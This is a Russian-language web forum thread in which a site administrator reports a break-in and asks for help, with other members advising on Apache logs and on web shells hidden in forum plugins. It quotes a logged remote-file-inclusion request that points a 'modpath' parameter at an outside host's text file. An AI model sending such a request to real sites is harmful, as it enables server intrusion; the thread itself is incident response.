VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Попытка взлома: Hack in GET - modpath = http://redeyes.altervista.org/guide.txt?
IP Адрес: 72.232.7.138
Пользователь: Guest
Ссылка: /index.php?modpath=http://redeyes.altervista.org/guide.txt?
Дата размещения: 05.04.07 - 20:29:29
На фтп появилась вот такая мп3 http://webfile.ru/1367548
Сравнение файлов со старых бекапов выявило некоторые несоответствия. Файлы которые различаются, я восстановил и залил на вебфайл http://webfile.ru/1368305
Сравнение файлов так же показало, файлы различаются в основном форумные.
У кого будут какие предложения по защите?
Location: Улыбаемся и машем, машем и улыбаемся... :)ь
Награды в конкурсах:
Posts: 2,958
Версия vB: 1.x.x
Reputation:
Professional 858
Репутация в разделе: 181
0
Quote:
Originally Posted by dh_
У кого будут какие предложения по защите?
выбрасывай слеад 2,0 и интеграцию нахрен!!!
ставь адвансис
@dh_
Простоузер
Join Date: Dec 2005
Posts: 25
Reputation:
Novice 9
Репутация в разделе: 0
0
slaed 2.0 lite у меня стоит. Может это всё же через форум ломанули? Сейчас попробывал тоже самое запостить на mynuke.ru - не смог создать пост, изза ссылок, которые содержались в письме. И файлы различаются исключительно форумные.
@shpunsetoy
Эксперт
Join Date: Oct 2005
Location: Хабаровск
Posts: 1,656
Версия vB: 3.8 Beta
Reputation:
Expert 1164
Репутация в разделе: 160
0
а логи апача посмотреть не пробовал?
@dh_
Простоузер
Join Date: Dec 2005
Posts: 25
Reputation:
Novice 9
Репутация в разделе: 0
0
Quote:
Originally Posted by shpunsetoy
а логи апача посмотреть не пробовал?
Пробывал. Меня 1й раз ломают я незнаю что именно нужно искать. И их там много 5 метров. Логи я вылоожил на webfile. Размер в архиве - 500 килобайт. Если у кого возникнет желание помочь разобраться с логами, отпишитесь, или напишите в личку. Вышлю в личку ссылку. IP адреса 72.232.7.138 в логах не найдено.
Last edited by dh_ : 04-09-2007 at 03:27 AM.
@Malcolm Reed
Эксперт
Join Date: Jan 2006
Location: http://www.lisichko.ru
Posts: 4,637
Версия vB: 3.6 Beta
Reputation:
Expert 1682
Репутация в разделе: 423
0
Ща посмотрим.
Сломать могли что угодно, но приоритет здесь такой:
1. Интеграцию.
2. ЦМСку
3. Прочий человеческий фактор
4. vbulletin
index.php?modpath=...
Это индекс форума или сайта? Если форума, то проверь админка - модули и продукты - управление модулями, на предмет наличия левых модулей в которых может быть шелл.
Вообще проверь модули по любому - в них очень удобно шеллы встраивать т.к. все про них забывают и ищут дыру только в файлах.
@Malcolm Reed
Эксперт
Join Date: Jan 2006
Location: http://www.lisichko.ru
Posts: 4,637
Версия vB: 3.6 Beta
Reputation:
Expert 1682
Репутация в разделе: 423
0
А "изменения" в твоих файлах связано только с двумя причинами:
1. При заливке где-то добавил пробел
2. Был установлен Hide Hack =\
Три файла просмотрел, осталыные уже смотреть не охота т.к. вряд ил в них есть что-то интересно
@dh_
Простоузер
Join Date: Dec 2005
Posts: 25
Reputation:
Novice 9
Репутация в разделе: 0
0
Я может чтото не так понимаю? Какие модули нужно проверить? Я в тотал коммандере сравнил. - он сравнивает и по содержимому и где какие лишние файлы тоже показывает. Всё что различалось я выложил. А про Hide Hack я у второго админа спрошу. Может он устанавливал и мне не сказал.
@Malcolm Reed
Эксперт
Join Date: Jan 2006
Location: http://www.lisichko.ru
Posts: 4,637
Версия vB: 3.6 Beta
Reputation:
Expert 1682
Репутация в разделе: 423
0
админка- модули и продукты - управление модулями.
Эти. Во-первых проверь левые модули которые ты не устанавливал.
моудли храняться в базе а не в файлах. Тоталкоммандер никаким раком не заметит в них изменений.